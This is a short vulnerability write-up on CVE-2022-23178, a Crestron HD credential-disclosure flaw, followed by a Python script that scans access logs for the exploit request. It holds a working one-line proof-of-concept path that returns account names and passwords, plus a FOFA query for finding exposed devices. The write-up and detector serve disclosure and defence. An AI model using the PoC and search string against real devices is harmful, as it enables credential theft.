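# Crestron aj.html Account and Password Disclosure Vulnerability CVE-2022-23178

## Vulnerability Description

On Crestron HD and other series devices, requesting the aj.html page with a specific parameter returns sensitive information such as account names and passwords.

## Affected Products

```
Crestron HD and other series devices
```

## FOFA

```
app="Crestron-HD-RX-201-C-E"
```

## Reproduction

POC

```
/aj.html?a=devi
```

![image-20220519161948146](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191619189.png)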
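
One way to hunt for this request in access logs, as an added example that is not part of the original write-up. It assumes a reverse proxy in front of the devices writing Combined Log Format and a management range of 10.20.0.0/24; the log lines are constructed.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: hosts permitted to use the device web UI (constructed range).
MGMT_NETS = [ip_network("10.20.0.0/24")]

# Combined Log Format as written by a reverse proxy in front of the devices.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
10.20.0.15 - - [19/May/2022:16:10:01 +0800] "GET /index.html HTTP/1.1" 200 5120
203.0.113.7 - - [19/May/2022:16:19:48 +0800] "GET /aj.html?a=devi HTTP/1.1" 200 842
203.0.113.7 - - [19/May/2022:16:19:50 +0800] "GET /%61j.html?x=1&a=%64evi HTTP/1.1" 200 842
10.20.0.15 - - [19/May/2022:16:21:02 +0800] "GET /aj.html?a=devi HTTP/1.1" 200 842
198.51.100.9 - - [19/May/2022:16:25:30 +0800] "GET /aj.html?a=devi HTTP/1.1" 403 0
"""

def is_external(src):
    try:
        addr = ip_address(src)
    except ValueError:
        return True  # hostname or garbage in the client field: treat as untrusted
    return not any(addr in net for net in MGMT_NETS)

def find_hits(log_text):
    """Return one dict per request for aj.html carrying a=devi."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        # Decode before comparing so %-encoded paths and values still match.
        path = unquote(parts.path).lower()
        a_values = [v.lower() for v in parse_qs(parts.query).get("a", [])]
        if not path.endswith("/aj.html") or "devi" not in a_values:
            continue
        served = m["status"] == "200"
        priority = "high" if is_external(m["src"]) and served else "review"
        hits.append({"src": m["src"], "target": m["target"],
                     "status": m["status"], "priority": priority})
    return hits

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```

A `high` hit means the response was served to a client outside the management range, so the credentials configured on that device should be treated as exposed and rotated.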